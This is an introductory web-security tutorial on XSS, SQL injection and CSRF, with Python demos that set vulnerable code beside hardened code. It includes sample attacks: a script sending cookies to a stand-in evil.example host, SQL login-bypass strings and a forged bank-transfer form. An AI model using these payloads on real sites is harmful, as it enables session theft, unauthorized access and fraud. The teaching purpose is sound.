Common Threats (XSS, SQLi, CSRF) | Cyber Security Tutorial - Learn with VOKS


Common Threats (XSS, SQLi, CSRF)

Web applications face many security threats, but three of the most common and dangerous are:

  • Cross-Site Scripting (XSS)
  • SQL Injection (SQLi)
  • Cross-Site Request Forgery (CSRF)

This explanation is written for beginners and will clearly explain what each attack is, how it works, and how to prevent it.

Cross-Site Scripting (XSS)

What Is XSS

Cross-Site Scripting (XSS) is a vulnerability that lets an attacker inject a script (usually JavaScript) into a web page that other users then view in their browsers.

It happens when a website places user-controlled data into a page without escaping it for the context where it lands (HTML body, attribute value, JavaScript, URL).

How XSS Works

Imagine a comment section on a website.

A user submits this comment:


<script>alert("Hacked");</script>

If the website places the comment into the page without escaping it, the browser cannot tell the comment from the site's own markup and executes the script.

The script runs with the site's origin, so it can read and change the page, act as the logged-in user, and read any cookie that is not marked HttpOnly.

Types Of XSS

Stored XSS

The payload is saved on the server (for example in a database) and delivered to every visitor who views the affected page.

Reflected XSS

The payload travels in the request (typically a URL parameter) and the server echoes it into the response. The victim has to be tricked into opening a crafted link.

DOM-Based XSS

The server is not involved. The page's own client-side JavaScript reads attacker-controlled data (for example from location.hash) and writes it into the DOM without escaping.

Example Of Vulnerable Code (XSS)

Unsafe example (the comment is written straight into the HTML):


user_input = input("Enter comment: ")
print("<html><body>")
print(user_input)  # inserted verbatim: any markup in the comment becomes part of the page
print("</body></html>")

If the user enters a script tag, the browser executes it when it renders this page.

How To Prevent XSS

  • Escape output for the context it is inserted into (HTML body, attribute, JavaScript, URL). Escaping on the way in is not enough, because the same data can end up in several contexts.
  • Use frameworks and template engines that auto-escape output by default.
  • Deploy a Content Security Policy (CSP) that disallows inline scripts, as a second line of defence.
  • Validate input (type, length, allowed characters) and, where rich HTML must be accepted, sanitize it with a dedicated library rather than home-made regular expressions.
  • Mark session cookies HttpOnly so an injected script cannot read them.

Safer example:


import html

user_input = input("Enter comment: ")
safe_output = html.escape(user_input)

print("<html><body>")
print(safe_output)
print("</body></html>")

The html.escape() function converts <, >, &, " and ' into HTML entities (&lt;, &gt;, &amp;, &quot;, &#x27;), so the browser displays them as text instead of parsing them as markup. This is the correct escaping for the HTML body and for quoted attribute values; data placed into JavaScript, CSS or a URL needs escaping specific to that context.
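The following Python example is added here and is not part of the original tutorial. It puts the vulnerable renderer beside the escaped one and also covers a case the comment example above does not: a user-supplied value placed into an href attribute, where html.escape alone is not enough because a javascript: URL contains no HTML special characters. The payload strings, function names and CSP header value are constructed for the example.

```python
import html

# Constructed attacker input for this example (not from the original page).
COMMENT_PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
LINK_PAYLOAD = "javascript:alert(document.cookie)"


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable: the comment is concatenated straight into the HTML."""
    return "<html><body><p>" + comment + "</p></body></html>"


def render_comment_safe(comment: str) -> str:
    """Hardened: html.escape turns < > & " ' into entities, so the browser
    shows the text instead of parsing it as markup."""
    return "<html><body><p>" + html.escape(comment, quote=True) + "</p></body></html>"


def render_link_escaped_only(url: str) -> str:
    """Still vulnerable: escaping is context-specific. A javascript: URL has no
    HTML special characters, so html.escape leaves it intact inside href."""
    return '<a href="' + html.escape(url, quote=True) + '">profile</a>'


def render_link_safe(url: str) -> str:
    """Hardened for the URL context: allow only http(s) URLs, then escape
    for the attribute context as well."""
    if not url.lower().startswith(("http://", "https://")):
        url = "#"  # refuse anything that is not a plain web URL
    return '<a href="' + html.escape(url, quote=True) + '">profile</a>'


# Defence in depth: a Content Security Policy response header that forbids
# inline scripts. Even if a payload slips through, the browser refuses to run it.
CSP_HEADER = ("Content-Security-Policy", "default-src 'self'; script-src 'self'")


def script_would_run(page: str) -> bool:
    """Rough check used by the demo: is a raw <script> tag present in the page?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print("unsafe comment   :", script_would_run(render_comment_unsafe(COMMENT_PAYLOAD)))
    print("escaped comment  :", script_would_run(render_comment_safe(COMMENT_PAYLOAD)))
    print("href, escaped    :", render_link_escaped_only(LINK_PAYLOAD))
    print("href, validated  :", render_link_safe(LINK_PAYLOAD))
    print("response header  :", CSP_HEADER)
```

The link case is the one beginners most often miss: the escaped version is valid, harmless-looking HTML, yet clicking it runs the attacker's script. Validate the value against what the context allows (here, an http or https URL) and then escape it for the attribute.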

SQL Injection (SQLi)

What Is SQL Injection

SQL Injection occurs when attacker-supplied input is placed into a SQL statement in a way that changes the structure of the statement, letting the attacker read, modify or delete data, or bypass authentication.

It happens when applications build queries by concatenating user input into SQL text instead of passing it as a separate value.

How SQL Injection Works

Imagine a login system that builds its query by string concatenation:


username = input("Enter username: ")
password = input("Enter password: ")

# Vulnerable: quotes and operators typed by the user become part of the SQL text
query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'"
print(query)

If the attacker enters any username and this password:

Password:

' OR '1'='1

The query becomes:

SELECT * FROM users WHERE username = '' AND password = '' OR '1'='1'

Because AND binds tighter than OR, the database reads this as (username = '' AND password = '') OR '1'='1'. The second half is always true, so the query returns every row and the attacker is logged in, typically as the first user in the table.

Note the same payload typed into the username field alone does not work: username = '' OR '1'='1' AND password = '' still requires the password to match. Attackers get around this by ending the payload with a SQL comment, for example ' OR 1=1 --, which discards the rest of the statement.

How To Prevent SQL Injection

  • Use parameterized queries (prepared statements): the SQL text is fixed and the values are bound separately, so input can never change the statement.
  • Validate input (type, length, format) as a secondary measure; validation alone does not stop injection.
  • Avoid building query text from user input. Where a table or column name must vary, choose it from a fixed allow-list in code.
  • Run the application with a database account that has only the privileges it needs, so a successful injection does less damage.

Safer example (Python's sqlite3 driver; the same ? placeholder style works with most database libraries):


import sqlite3

username = input("Enter username: ")
password = input("Enter password: ")

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
query = "SELECT * FROM users WHERE username = ? AND password = ?"
# The driver sends the SQL text and the values separately; the values are never parsed as SQL.
rows = conn.execute(query, (username, password)).fetchall()
print(rows)

Parameterized queries keep the SQL text fixed, so user input can only ever be a value, never part of the statement. The plain-text password comparison is kept only to stay close to the vulnerable example; a real login compares a salted password hash.
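The following Python example is added here and is not from the original tutorial. It runs both versions of the login query against an in-memory SQLite database with two constructed user rows, so you can watch the bypass succeed against string concatenation and fail against placeholders. It also shows the precedence point: the payload works in the password field or with a trailing comment, but not in the username field alone. The user rows, function names and payloads are constructed for the example.

```python
import sqlite3

# Constructed sample data for this example (not from the original page).
# Passwords are stored in plain text only to keep the demo short; a real
# system stores a salted password hash and compares against that.
USERS = [("alice", "correct horse"), ("bob", "hunter2")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Vulnerable: user input is spliced into the SQL text, so quotes and
    operators in the input change the structure of the query."""
    query = ("SELECT username FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(query)]


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Hardened: placeholders keep the SQL text fixed; the driver binds the
    values separately, so a quote in the input is just a quote."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(query, (username, password))]


if __name__ == "__main__":
    conn = make_db()
    # Payload in the password field: AND binds tighter than OR, so the WHERE
    # clause reads (username='' AND password='') OR '1'='1', which is always true.
    print("vulnerable, ' OR '1'='1 as password :", login_vulnerable(conn, "", "' OR '1'='1"))
    # The same payload in the username alone is defeated by precedence ...
    print("vulnerable, payload in username only:", login_vulnerable(conn, "' OR '1'='1", "x"))
    # ... unless the attacker comments out the rest of the statement.
    print("vulnerable, ' OR 1=1 -- as username :", login_vulnerable(conn, "' OR 1=1 --", "x"))
    # Parameterized: the payload is compared as a literal string and matches nothing.
    print("safe, same payloads                 :",
          login_safe(conn, "' OR 1=1 --", "x"), login_safe(conn, "", "' OR '1'='1"))
    print("safe, real credentials              :", login_safe(conn, "alice", "correct horse"))
```

Run it and compare the vulnerable and safe outputs for the same inputs: the concatenated query returns both users for two of the three payloads, while the parameterized query returns nothing until the real credentials are supplied.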

Cross-Site Request Forgery (CSRF)

What Is CSRF

Cross-Site Request Forgery tricks a logged-in user's browser into sending a request the user did not intend to make.

The attacker does not need the password.

The browser automatically attaches the victim's session cookie to every request it sends to the target site, so a request triggered from the attacker's page is treated as the victim's own.

How CSRF Works

  1. User logs into a banking website.
  2. User remains logged in.
  3. User visits a malicious website.
  4. A page on that site makes the browser send a request to the banking site (for example through a hidden form or an image tag).
  5. The browser attaches the victim's session cookie, so the bank treats the request as genuine and performs the action.

Example of malicious HTML:


<form action="https://bank.com/transfer" method="POST">
  <input type="hidden" name="amount" value="1000">
  <input type="hidden" name="to_account" value="attacker_account">
  <input type="submit" value="Click Here">
</form>

If the victim clicks the button, the transfer may occur. In practice the attacker's page submits the form automatically with a few lines of JavaScript, so no click is needed, and the browser attaches the victim's bank cookie to the POST.

How To Prevent CSRF

  • Use CSRF tokens: a random, per-session value embedded in every state-changing form and checked on the server.
  • Require re-authentication (or a second factor) for sensitive actions such as transfers or password changes.
  • Set SameSite=Lax or SameSite=Strict on the session cookie so the browser does not attach it to cross-site requests.
  • Check the Origin (or Referer) header on state-changing requests and reject requests from other origins.
  • Never perform state changes in response to GET requests.

Example of CSRF token validation (conceptual):


import hmac
import secrets

# In a real application the token is generated once per session, kept with the
# session on the server, and embedded as a hidden field in every state-changing form.
session_token = secrets.token_urlsafe(32)
print("Token embedded in the form:", session_token)
form_token = input("Enter CSRF token: ")

# Constant-time comparison, so the check does not leak the token byte by byte.
if hmac.compare_digest(form_token, session_token):
    print("Request allowed")
else:
    print("Invalid CSRF token")

The token works because the attacker's page cannot read it: the same-origin policy stops one site from reading another site's pages, so the forged request arrives without a valid token and is rejected. The token must be unpredictable (generated from a secure random source, not a fixed string) or the attacker could simply guess it.
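The following Python example is added here and is not from the original tutorial. It simulates the server side of the banking transfer: a session store that issues a random CSRF token at login, and a request handler that checks the Origin header and the token before moving money. Requests are plain dicts constructed to stand in for a browser's real HTTP request; SITE_ORIGIN, the sessions store and all function names are hypothetical.

```python
import hmac
import secrets
from typing import Dict, Optional

# Hypothetical names for this example (not from the original page).
SITE_ORIGIN = "https://bank.example"
sessions: Dict[str, dict] = {}  # session-cookie value -> per-session state


def login(user: str) -> str:
    """Create a session and issue it a random CSRF token; returns the cookie value."""
    session_id = secrets.token_urlsafe(32)
    sessions[session_id] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return session_id


def csrf_token_for(session_id: str) -> str:
    """The legitimate site embeds this value in its transfer form as a hidden field."""
    return sessions[session_id]["csrf"]


def handle_transfer(request: dict) -> str:
    """Server-side checks for a state-changing POST.

    request is a constructed dict with keys 'cookies', 'headers' and 'form'.
    Returns a short status string.
    """
    session = sessions.get(request["cookies"].get("session", ""))
    if session is None:
        return "401 not logged in"
    # Check 1: browsers send an Origin header on cross-site POSTs; it must be ours.
    # If the header is absent we fall through to the token check rather than trusting the request.
    origin: Optional[str] = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "403 cross-origin request"
    # Check 2: the form must carry the token tied to this session. A form on the
    # attacker's page cannot read the token because of the same-origin policy.
    submitted = request["form"].get("csrf", "")
    if not hmac.compare_digest(submitted, session["csrf"]):
        return "403 missing or invalid CSRF token"
    return "200 transferred " + request["form"]["amount"] + " to " + request["form"]["to_account"]


def legitimate_request(session_id: str) -> dict:
    """Constructed: what the bank's own transfer form submits."""
    return {
        "cookies": {"session": session_id},
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"amount": "10", "to_account": "savings", "csrf": csrf_token_for(session_id)},
    }


def forged_request(session_id: str) -> dict:
    """Constructed: the hidden form from the attacker's page. The browser attaches
    the victim's cookie, but the attacker knows neither the token nor can the
    attacker's page change the Origin header the browser sends."""
    return {
        "cookies": {"session": session_id},
        "headers": {"Origin": "https://evil.example"},
        "form": {"amount": "1000", "to_account": "attacker_account"},
    }


if __name__ == "__main__":
    sid = login("victim")
    print(handle_transfer(legitimate_request(sid)))
    print(handle_transfer(forged_request(sid)))
```

Both checks are kept because neither is complete on its own: some clients omit the Origin header, and a token check protects against that, while the Origin check catches forged requests even if a token ever leaks. SameSite cookies are not modelled here; with SameSite=Lax or Strict on the session cookie, the forged request would arrive with no cookie at all and fail at the first check.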

Comparison Of XSS, SQLi, And CSRF

XSS

Injects malicious scripts into web pages. The target is the browser of other users of the site; the flaw is missing output escaping.

SQL Injection

Injects malicious SQL into database queries. The target is the database behind the site; the flaw is building queries from user input.

CSRF

Tricks a logged-in user's browser into sending requests the user did not intend. The target is the victim's authenticated session; the flaw is accepting a request only because it carries a valid cookie.

Why These Threats Are Dangerous

They can lead to:

  • Account takeover
  • Data theft
  • Financial loss
  • Website defacement
  • Loss of trust

These attacks are among the most common web vulnerabilities.
